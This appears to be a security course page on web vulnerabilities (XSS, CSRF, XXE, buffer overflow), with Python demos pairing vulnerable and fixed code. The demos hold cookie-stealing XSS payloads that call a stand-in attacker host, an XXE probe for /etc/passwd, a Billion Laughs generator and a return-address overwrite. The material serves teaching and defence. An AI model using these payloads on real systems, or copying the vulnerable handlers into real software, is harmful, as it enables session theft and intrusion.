5. Web application vulnerabilities and countermeasures - Part 1¶
Web Security Basics 1 2 3¶
- OWASP:
- Open Web Application Security Project.
- Started in 2001.
- SSDLC :
- Secure Software Development Life Cycle.
- OWASP Top 10 Vulnerabilities (2017 edition) 1:
- A1: Injection.
- A2: Broken Authentication.
- A3: Sensitive Data Exposure.
- A4: XML External Entities (XXE).
- A5: Broken Access Control.
- A6: Security Misconfiguration.
- A7: Cross-Site Scripting (XSS).
- A8: Insecure Deserialization.
- A9: Using Components with Known Vulnerabilities.
- A10: Insufficient Logging and Monitoring.
- Use https://nvd.nist.gov/ to check for vulnerabilities.
- CVSS:
- Common Vulnerability Scoring System (the NVD entries above carry a CVSS score).
- A score from 0.0 to 10.0.
- 0.0: None; 0.1 to 3.9: Low; 4.0 to 6.9: Medium; 7.0 to 8.9: High (CVSS v3 qualitative ratings).
- 9.0 to 10.0: Critical.
- Attackers Classifications 3, based on their knowledge, motivation, resources, and method of operations:
- Script Kiddies:
- Amateur attackers.
- Motivation: Fun, spread chaos, and gain reputation.
- Limited knowledge, use existing tools and look for easy targets.
- No motivation to access sensitive data.
- Black-Hat Attackers:
- Professional attackers.
- Motivation: Financial gain.
- Advanced knowledge, use of illegal and unethical methods.
- More involved in organized crime.
- White-Hat Attackers:
- Professional security testers (penetration testers, bug-bounty hunters).
- Motivation: Financial gain, through authorized and paid work.
- Advanced knowledge; use of legal and ethical methods.
- Help eliminate vulnerabilities by reporting them.
- Hacktivists.
- Organized Crime.
- Nation States.
- Insiders.
- Competitors.
- Attackers Classifications 3, based on their targets:
- Opportunistic:
- Attackers who target any vulnerable system, that is, choose their targets randomly.
- Use automated tools to scan the internet for vulnerable systems.
- Use the vulnerabilities to gain access to the system.
- Use the system to launch attacks on other systems.
- Targeted:
- Attackers who target a specific system, that is, choose their targets carefully.
- Use social engineering to gain access to the system.
- Recommendations about web security:
- Use vulnerability scanners to scan your web application.
- Prioritize web security over network security: there are far fewer successful network attacks than web attacks.
- Web Application Firewall (WAF) is a must, but it is not enough.
Cross-Site Scripting (XSS) 4 5 6 7¶
- XSS 4:
- It is a type of injection attack.
- The malicious script runs on the client side (the victim’s browser), but it may be saved to the server and run every time a certain page/end-point is requested.
- The usual goal is to steal cookies, session tokens and other sensitive information, or to act in the victim's browser on their behalf.
- Mostly done with HTML and JavaScript.
- The attacker places a malicious script in the web application, and the victim’s browser executes it and sends the results to the attacker.
- Recommended Tools for XSS:
- Intruder: a vulnerability scanner.
- ManageEngine: a vulnerability scanner, with suggestions for fixing the vulnerabilities.
- Prevention of XSS 4:
- Data validation: allow-list what each field may contain.
- Filtering user input: deny-lists of dangerous tags are easy to bypass, so filtering alone is not a defense.
- Escaping (output encoding) user input at render time, using the encoding of the context it lands in (HTML text, attribute, JavaScript, URL).
- XSS types 5:
- Reflected XSS: the malicious script arrives in the request (typically a URL parameter), is reflected into the response and executed on the client side; it is not saved on the server.
- Stored XSS: the malicious script is saved on the server (database, comment, profile field) and executed every time a certain page/end-point is requested.
- DOM XSS: a client-side code injection; the payload is not saved and need not reach the server at all. A legitimate script on the page reads attacker-controlled data (for example from the URL fragment) and writes it into the DOM through a dangerous sink such as innerHTML or document.write, so the malicious script runs when the victim opens the modified URL.
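Added worked example (not code from the page or its sources): a comment renderer in three versions, showing why a deny-list filter fails, why escaping at output time works for the HTML text context, and why the URL/attribute context needs scheme validation on top of escaping. The payloads, the `attacker.example` host and the page fragments are constructed for the demo.

```python
"""Added example: filtering vs. context-aware output encoding for XSS.
All payloads and markup below are constructed for the demo."""
import html
import re
from urllib.parse import urlsplit


def render_comment_unsafe(author, comment):
    """Vulnerable: user-controlled text is concatenated straight into HTML.
    Whether the payload came from a URL parameter (reflected) or from the
    database (stored) makes no difference; the bug is at the output."""
    return f'<p class="comment"><b>{author}</b>: {comment}</p>'


def strip_script_tags(text):
    """Naive deny-list filter: removes <script> blocks and nothing else."""
    return re.sub(r"<script\b.*?</script\s*>", "", text, flags=re.I | re.S)


def render_comment_filtered(author, comment):
    """Still vulnerable: the filter only knows one payload shape, and an
    <img onerror=...> payload executes just as well as a <script> block."""
    return render_comment_unsafe(strip_script_tags(author), strip_script_tags(comment))


def render_comment_safe(author, comment):
    """Fixed for the HTML text context: every untrusted value is escaped at
    render time, so a '<' in the data can never open a tag."""
    return f'<p class="comment"><b>{html.escape(author)}</b>: {html.escape(comment)}</p>'


def safe_href(url):
    """URL context needs more than escaping: html.escape leaves
    'javascript:alert(1)' untouched and it still runs when clicked.
    Allow-list the scheme first, then escape for the attribute."""
    scheme = urlsplit(url.strip()).scheme.lower()
    if scheme not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


def render_link_safe(label, url):
    return f'<a href="{safe_href(url)}">{html.escape(label)}</a>'


# Constructed payloads: a cookie-stealing <script>, the same goal via an
# event handler that the script filter never sees, and a javascript: URL.
SCRIPT_PAYLOAD = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'
IMG_PAYLOAD = '<img src=x onerror="new Image().src=\'https://attacker.example/?c=\'+document.cookie">'
JS_URL = "JavaScript:alert(document.cookie)"

if __name__ == "__main__":
    print(render_comment_unsafe("bob", SCRIPT_PAYLOAD))    # script tag lands in the page
    print(render_comment_filtered("bob", IMG_PAYLOAD))      # filter bypassed
    print(render_comment_safe("bob", IMG_PAYLOAD))          # rendered as inert text
    print(render_link_safe("profile", JS_URL))              # href neutralised to "#"
```

The same `html.escape` call fixes both reflected and stored XSS because both are output problems; it does not fix DOM XSS, which happens in the browser after the server has already responded, and where the equivalent fix is writing untrusted data with `textContent` rather than `innerHTML`.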
Cross-Site Request Forgery (CSRF) 8 9 10¶
- Also named Session Riding or One-Click Attack or Sea-Surf or XSRF. 8
- CSRF 8:
- It is an attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated.
- With a little help from social engineering, the attacker tricks the victim into clicking a link or visiting a page that issues the unwanted request; the browser attaches the victim's cookies to it automatically.
- The attacker can NOT see the response or read your data, so CSRF is used to change state (transfer funds, change an e-mail address or password), not to steal it.
- Prevention measures that do NOT work 9:
- Using secret cookies: the browser sends all cookies for the site with a forged request too, so the server cannot tell a legitimate request from a forged one.
- Only accepting POST requests: the attacker can still send a POST from an auto-submitted form on their own page, although it is a bit harder.
- Multi-step transactions: the attacker can forge each step in order.
- URL rewriting (session id in the URL instead of a cookie): it moves the credential, it does not bind the request to the user's intent.
- HTTPS: HTTPS itself does nothing to prevent CSRF.
- Referer header checking: not reliable on its own, as the Referer is not always sent (privacy settings, Referrer-Policy); at best defense in depth.
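Added worked example (not from the page or its sources): the synchronizer token pattern, which is what does work against CSRF, applied to a state-changing `/transfer` endpoint. Requests, cookies and the session store are modelled as dicts so the code runs offline; the `bank.example` and `attacker.example` origins, the account names and the balances are constructed for the demo.

```python
"""Added example: a CSRF synchronizer token on a state-changing POST.
Requests, cookies and sessions are plain dicts; everything is constructed."""
import hmac
import secrets

SESSIONS = {}                              # session id -> {"user": ..., "csrf": ...}
BALANCES = {"alice": 100, "mallory": 0}    # constructed sample accounts


def login(user):
    """Create a session and a per-session CSRF token the attacker cannot read."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid


def render_transfer_form(sid):
    """The legitimate page embeds the token. A cross-site page cannot copy it,
    because the same-origin policy stops it from reading this response."""
    token = SESSIONS[sid]["csrf"]
    return ('<form method="POST" action="/transfer">'
            f'<input type="hidden" name="csrf_token" value="{token}">'
            '<input name="to"><input name="amount"><button>Send</button></form>')


def _session_for(request):
    return SESSIONS.get(request.get("cookies", {}).get("sid"))


def _do_transfer(user, form):
    to, amount = form["to"], int(form["amount"])
    if to not in BALANCES or BALANCES.get(user, 0) < amount:
        return 400, "rejected"
    BALANCES[user] -= amount
    BALANCES[to] += amount
    return 200, f"moved {amount} from {user} to {to}"


def transfer_unsafe(request):
    """Vulnerable: trusts the session cookie alone. The browser attaches that
    cookie to a forged POST as well, which is why 'POST only' does not help."""
    session = _session_for(request)
    if session is None:
        return 401, "not logged in"
    return _do_transfer(session["user"], request["form"])


def transfer_safe(request):
    """Fixed: the form must carry the token stored in this session.
    compare_digest keeps the comparison constant-time."""
    session = _session_for(request)
    if session is None:
        return 401, "not logged in"
    submitted = request.get("form", {}).get("csrf_token", "")
    if not hmac.compare_digest(submitted, session["csrf"]):
        return 403, "csrf token missing or invalid"
    return _do_transfer(session["user"], request["form"])


def forged_request(sid):
    """What the victim's browser sends after visiting attacker.example: an
    auto-submitted POST carrying the victim's cookie but no token."""
    return {"cookies": {"sid": sid},
            "headers": {"Origin": "https://attacker.example"},
            "form": {"to": "mallory", "amount": "50"}}


def legitimate_request(sid):
    """A submission of the real form: same cookie, plus the session's token."""
    return {"cookies": {"sid": sid},
            "headers": {"Origin": "https://bank.example"},
            "form": {"to": "mallory", "amount": "10",
                     "csrf_token": SESSIONS[sid]["csrf"]}}


if __name__ == "__main__":
    sid = login("alice")
    print(transfer_unsafe(forged_request(sid)))    # (200, ...): money moves
    print(transfer_safe(forged_request(sid)))      # (403, ...): forged request stopped
    print(transfer_safe(legitimate_request(sid)))  # (200, ...): real form still works
```

Setting the session cookie with `SameSite=Lax` or `Strict` is a second layer that stops the browser from attaching the cookie to the forged cross-site POST in the first place; the token check remains the primary control because older clients and some cross-site cases do not honour SameSite.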
XML Injection 11 12 13 14¶
- Also known as XML External Entity (XXE) injection, CWE-611 11.
- XXE 11:
- An attack that abuses features of XML parsers/data.
- A website that accepts XML input and processes it using a weakly configured XML parser is vulnerable to XXE.
- The Billion Laughs Attack 12:
- An entity-expansion attack that abuses the same DTD entity mechanism as XXE; it uses only internal entities, so it works even where external entities are disabled.
- The attacker sends a small XML file in which each entity references the previous one many times (lol1 is ten copies of lol0, lol2 is ten copies of lol1, and so on).
- The XML parser will try to expand the entities, and the exponential blow-up causes a Denial of Service (DoS).
- Under 1KB of such nested entity declarations (ten levels of ten) expand to about 3GB of text, which exhausts memory and may crash the server.
- An attacker may use XXE to 12:
- Cause a DoS.
- Access local files (on the server).
- Generate network connections to other machines.
- Alter firewall configurations.
- Port scanning.
- Server Side Request Forgery (SSRF).
- Famous attacks 13:
- Billion Laughs.
- YAML Bombs.
- Quadratic Blowup.
- External Entity Expansion.
- DTD Retrieval (Document Type Definition Retrieval): referencing an external DTD file that carries malicious entity declarations.
- Decompression Bombs: a compressed file that expands to a very large size.
- XPath Injection: an attack that injects malicious code into an XPath query.
- XInclude: XInclude is a way to include XML files (or local files as text) inside other XML files; an attacker who controls an XInclude element can read files from the server.
- XSLT Injection: an attack that injects malicious code into an XSLT stylesheet, XSLT is a fully Turing complete language.
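Added worked example (not from the page or its sources) covering the Billion Laughs section and the XXE list above: a pre-parse triage step that flags external entities and computes, by arithmetic rather than by expansion, how large a document would become once its internal entities are expanded. It rebuilds the classic ten-by-ten bomb to check the page's 1KB-to-3GB figure. The `triage_xml` name, the 1,000,000-character budget and the sample documents (including the `file:///etc/passwd` probe) are constructed for the demo; no XML parser is invoked.

```python
"""Added example: flag XXE and estimate entity expansion before parsing.
The bomb and the XXE probe below are constructed inline; nothing is parsed."""
import re

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b[^\[>]*(?:\[(.*?)\])?\s*>", re.S)
ENTITY_DECL_RE = re.compile(r"<!ENTITY\s+(\w+)\s+(SYSTEM|PUBLIC|\"[^\"]*\"|'[^']*')", re.S)
ENTITY_REF_RE = re.compile(r"&(\w+);")
PREDEFINED = {"lt", "gt", "amp", "quot", "apos"}   # expand to one character each


def parse_dtd_entities(xml_text):
    """Return ({name: replacement text} for internal entities, [names of external ones])."""
    internal, external = {}, []
    m = DOCTYPE_RE.search(xml_text)
    if m and m.group(1):
        for name, value in ENTITY_DECL_RE.findall(m.group(1)):
            if value in ("SYSTEM", "PUBLIC"):
                external.append(name)           # fetched from a URI: the XXE vector
            else:
                internal[name] = value[1:-1]    # strip the surrounding quotes
    return internal, external


def expanded_length(text, entities, _memo=None, _stack=()):
    """Length of `text` after recursively expanding &name; references.
    Memoised per entity, so a bomb costs a few hundred operations, not gigabytes."""
    if _memo is None:
        _memo = {}
    total, last = 0, 0
    for m in ENTITY_REF_RE.finditer(text):
        total += m.start() - last
        last = m.end()
        name = m.group(1)
        if name in PREDEFINED:
            total += 1
        elif name not in entities:
            total += len(m.group(0))            # undeclared: a parser would reject it
        else:
            if name in _stack:
                raise ValueError(f"recursive entity &{name};")
            if name not in _memo:
                _memo[name] = expanded_length(entities[name], entities, _memo, _stack + (name,))
            total += _memo[name]
    return total + len(text) - last


def triage_xml(xml_text, max_expansion=1_000_000):
    """Classify a document before parsing: ('ok' | 'xxe' | 'expansion-bomb', expanded size).
    The size covers the part of the document after the DOCTYPE."""
    internal, external = parse_dtd_entities(xml_text)
    if external:
        return "xxe", 0
    m = DOCTYPE_RE.search(xml_text)
    body = xml_text[m.end():] if m else xml_text
    size = expanded_length(body, internal)
    return ("expansion-bomb" if size > max_expansion else "ok"), size


def billion_laughs(depth=9, fanout=10):
    """Build the classic bomb: lol0 is "lol"; each level is `fanout` copies of the one below."""
    decls = ['<!ENTITY lol0 "lol">']
    for i in range(1, depth + 1):
        refs = "&lol%d;" % (i - 1) * fanout
        decls.append(f'<!ENTITY lol{i} "{refs}">')
    return ('<?xml version="1.0"?>\n<!DOCTYPE lolz [\n' + "\n".join(decls)
            + f'\n]>\n<lolz>&lol{depth};</lolz>')


# Constructed samples: an XXE probe reading a local file, and a harmless document.
XXE_DOC = ('<?xml version="1.0"?>\n'
           '<!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>\n'
           '<r>&xxe;</r>')
PLAIN_DOC = "<r><a>1 &amp; 2</a></r>"

if __name__ == "__main__":
    bomb = billion_laughs()
    print(len(bomb), "bytes on the wire ->", triage_xml(bomb))   # under 1KB -> ~3e9 chars
    print(triage_xml(XXE_DOC))
    print(triage_xml(PLAIN_DOC))
```

In production the simplest rule is to reject any document with a DOCTYPE, or to parse with a library that disables DTD processing (for Python, `defusedxml`); this triage is what such a rule is protecting against, and it also catches the external-DTD case only if you extend `parse_dtd_entities` to look at `SYSTEM`/`PUBLIC` on the DOCTYPE line itself.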
Buffer Overflow 15 16 17¶
- Buffer Overflow 15:
- A process writes more data into a buffer than the buffer was allocated to hold.
- The extra data is written to adjacent memory locations and overwrites the data in these locations.
- The attacker can: Control, Crash, or Corrupt a process.
- Buffer overflow types (the source groups them by the location of the affected buffer; the last three are related memory-corruption bugs rather than buffer locations) 15:
- Stack-based.
- Heap-based.
- Integer overflow.
- Format string.
- Unicode.
- Prevention of buffer overflow attacks 15:
- Use OS runtime protections (ASLR, non-executable stack/DEP, stack canaries).
- Keep updating the OS.
- Follow the principle of least privilege.
- Use memory-safe languages: Java, C#, Python, Ruby, etc.
- Validate input data.
- In a classic buffer overflow exploit, the attacker sends data to a program, which stores it in an undersized stack buffer. The result is that information on the call stack is overwritten, including the function's saved return address. The data sets the value of the return address so that when the function returns, it transfers control to malicious code contained in the attacker's data 17.
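Added worked example (not from the page or its sources) for the classic overflow just described: a fixed-size buffer followed in memory by a "saved return" slot, filled by an unbounded copy and by a length-checked copy. The struct is a model of a stack frame laid out in real native memory through `ctypes`, not an actual call stack, and the placeholder addresses are constructed; the unbounded copy is capped at the frame size only so the demo never writes outside its own allocation.

```python
"""Added example: an unbounded copy overwriting the value stored right after
an 8-byte buffer.  `Frame` models a stack frame; addresses are placeholders."""
import ctypes
import struct


class Frame(ctypes.Structure):
    """Eight-byte buffer immediately followed by a 'saved return' slot,
    standing in for the saved return address above a local array."""
    _fields_ = [("buf", ctypes.c_char * 8),
                ("saved_return", ctypes.c_uint32)]


BUF_SIZE = Frame.buf.size       # 8 bytes
ORIGINAL_RETURN = 0x08048ABC    # constructed placeholder for the real return address


def copy_unbounded(frame, data):
    """strcpy-style: copies len(data) bytes into an 8-byte buffer (vulnerable).
    The cap at sizeof(Frame) is only there to keep the demo inside the struct."""
    if len(data) > ctypes.sizeof(Frame):
        raise ValueError("demo keeps the write inside the modelled frame")
    ctypes.memmove(ctypes.addressof(frame) + Frame.buf.offset, data, len(data))


def copy_bounded(frame, data):
    """Fixed: validate the input length against the buffer before copying."""
    if len(data) > BUF_SIZE:
        raise ValueError(f"input of {len(data)} bytes exceeds {BUF_SIZE}-byte buffer")
    ctypes.memmove(ctypes.addressof(frame) + Frame.buf.offset, data, len(data))


def attacker_input(target_address):
    """Fill the buffer, then place the chosen address where saved_return lives.
    struct's native byte order matches ctypes.c_uint32 on the same machine."""
    return b"A" * BUF_SIZE + struct.pack("I", target_address)


def run(copy_fn, data):
    """Return saved_return after `copy_fn` processed `data`, or None if it was rejected."""
    frame = Frame()
    frame.saved_return = ORIGINAL_RETURN
    try:
        copy_fn(frame, data)
    except ValueError:
        return None
    return frame.saved_return


if __name__ == "__main__":
    payload = attacker_input(0xDEADBEEF)
    print(hex(run(copy_unbounded, b"hello")))   # 0x8048abc: short input, frame intact
    print(hex(run(copy_unbounded, payload)))    # 0xdeadbeef: saved return overwritten
    print(run(copy_bounded, payload))           # None: oversized input rejected
```

The twelve-byte payload is the smallest version of the exploit shape the paragraph describes: padding to the end of the buffer, then the value the attacker wants in the slot that follows. In a real process that slot is read by `ret`, which is why the overwritten value decides where execution continues, and why a stack canary placed between the buffer and the saved return address turns this into a detected crash instead of control of the process.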
References¶
- Edureka! (2020, July 13). Top web applications vulnerabilities | web application vulnerabilities for beginners | edureka [Video]. YouTube. https://www.youtube.com/watch?v=loyVGklGpjU&t=2s
- GoDaddy. (2020, January 15). Important features you need for website security [Video]. YouTube. https://www.youtube.com/watch?v=PTna1uuyWSg
- Nidecki, T. A. (2021, September 9). Web security basics: Is your web application safe? Acunetix. https://www.acunetix.com/blog/web-security-zone/web-security-basics/
- Cross-site scripting (XSS) attack tutorial with examples, types and prevention. (2021, November 29). Software Testing Help. https://www.softwaretestinghelp.com/cross-site-scripting-xss-attack-test/
- Edureka! (2019, December 10). What is cross-site scripting? | cross-site scripting attack | cross-site scripting tutorial | edureka [Video]. YouTube. https://www.youtube.com/watch?v=cWu_FJUrH5Y
- KristanS, Manico, J., Williams, J., Wichers, D., Weidman, A., Roman, Jex, A., Smith, A., Knutson, J., Imifos, Yalon, E., Kingthorin, & Khanna, V. (n.d.). Cross-site scripting (XSS). Open Web Application Security Project. https://owasp.org/www-community/attacks/xss/ Licensed under Creative Commons Attribution-ShareAlike 4.0.
- Secure Code Warrior. (2017, August 25). Cross-site scripting (XSS) | OWASP top 10 explainer video | Secure Code Warrior [Video]. YouTube. https://www.youtube.com/watch?v=H22cJTqCgUA
- Fullstack Academy. (2017, September 29). CSRF tutorial - a guide to better understand and defend against cross-site request forgery (CSRF) [Video]. YouTube. https://www.youtube.com/watch?v=13QPmRuhbhU
- KristanS, Wichers, D., Davisnw, Petefish, P., Weidman, A., Brooks, M., Mir, A., Dc, D0ubl3 h3lix, Manico, J., Gilbert, R., Tgondrom, Krawczyk, P., Brandt, Minhaz, A. V., Lorenzo, K., Smith, A., Schelin, C., Elias-Bachrach, A., Sarciszewski, Kingthorin, & Spatafora, B. (2021). Cross-site request forgery (CSRF). Open Web Application Security Project. https://owasp.org/www-community/attacks/csrf Licensed under Creative Commons Attribution-ShareAlike 4.0.
- Udacity. (2016, June 6). XSRF cross-site request forgery [Video]. YouTube. https://www.youtube.com/watch?v=9JrzPX1pVjs
- AppSecAcademy. (2019, February 21). #1 XML external entity (XXE) in 2 minutes | AppSec academy [Video]. YouTube. https://www.youtube.com/watch?v=_gfhgWvI6XI
- F5DevCentral. (2018, January 18). OWASP top 10: XML external entities [Video]. YouTube. https://www.youtube.com/watch?v=g2ey7ry8_CQ
- Mgeeky. (n.d.). XML vulnerabilities and attacks cheat sheet. GitHub Gist. https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870
- XML external entity (XXE) injection. (n.d.). PortSwigger. https://portswigger.net/web-security/xxe
- Eye on Tech. (2021, September 23). What is a buffer overflow attack? [Video]. YouTube. https://www.youtube.com/watch?v=YNkjX2Wqgh0
- W3w3w3. (2020, January 29). Buffer overflow attack tutorial - 0x00 [Video]. YouTube. https://www.youtube.com/watch?v=j7AEzGKuKUU
- Buffer overflow. (2021). Open Web Application Security Project. https://owasp.org/www-community/vulnerabilities/Buffer_Overflow Licensed under Creative Commons Attribution-ShareAlike 4.0.